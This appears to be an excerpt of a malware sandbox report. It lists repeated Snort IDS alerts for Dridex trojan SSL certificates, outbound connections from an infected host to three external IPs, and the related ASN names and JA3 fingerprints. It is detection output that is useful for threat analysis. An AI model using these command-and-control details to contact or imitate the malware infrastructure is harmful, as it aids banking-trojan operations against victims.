Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49258
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49259
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49260
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49260
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49262
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49263
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49264
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49264
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49266
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49267
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49268
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49268
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49270
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49271
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49272
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49272
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49274
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49275
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49276
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49276
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49278
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49279
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49280
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49280
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49282
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49283
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49284
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49284
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49286
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49287
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49288
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49288
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49290
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49291
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49292
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49292
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49294
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49295
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49296
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49296
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49298
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49299
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49300
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49300
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49302
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49303
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49304
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49304
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49306
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49307
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49308
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49308
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49310
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49311
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49312
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49312
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49314
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49315
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49316
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49316
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49318
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49319
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49320
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49320
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49322
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49323
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49324
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49324
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49326
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49327
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49328
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49328
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49330
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49331
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49332
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49332
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49334
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49335
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49336
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49336
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49338
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49339
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49340
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49340
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49342
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49343
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49344
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49344
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49346
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49347
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49348
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49348
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49350
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49351
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49352
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49352
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49354
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49355
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49356
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49356
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49358
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49359
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49360
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49360
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49362
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49363
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49364
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49364
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49366
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49367
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49368
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49368
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49370
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49371
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49372
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49372
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49374
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49375
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49376
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49376
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49378
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49379
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49380
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49380
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49382
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49383
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49384
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49384
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49386
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49387
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49388
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49388
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49390
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49391
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49392
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49392
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49394
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49395
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49396
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49396
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49398
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49399
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49400
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49400
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49402
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49403
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49404
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49404
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49406
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49407
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49408
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49408
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49410
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49411
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49412
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49412

Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 80.86.91.27:3308
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 5.100.228.233:3389
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 46.105.131.65:1512

Source: Joe Sandbox View	IP Address: 5.100.228.233 5.100.228.233
Source: Joe Sandbox View	IP Address: 80.86.91.27 80.86.91.27
Source: Joe Sandbox View	IP Address: 46.105.131.65 46.105.131.65
Source: Joe Sandbox View	IP Address: 77.220.64.37 77.220.64.37

Source: Joe Sandbox View	ASN Name: SENTIANL SENTIANL
Source: Joe Sandbox View	ASN Name: GD-EMEA-DC-SXB1DE GD-EMEA-DC-SXB1DE
Source: Joe Sandbox View	ASN Name: OVHFR OVHFR

Source: Joe Sandbox View	JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: Joe Sandbox View	JA3 fingerprint: eb88d0b3e1961a0562f006e5ce2a0b87

Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknown	TCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknown	TCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknown	TCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknown	TCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknown	TCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknown	TCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknown	TCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknown	TCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknown	TCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknown	TCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknown	TCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknown	TCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknown	TCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknown	TCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknown	TCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknown	TCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknown	TCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknown	TCP traffic detected without corresponding DNS query: 5.100.228.233
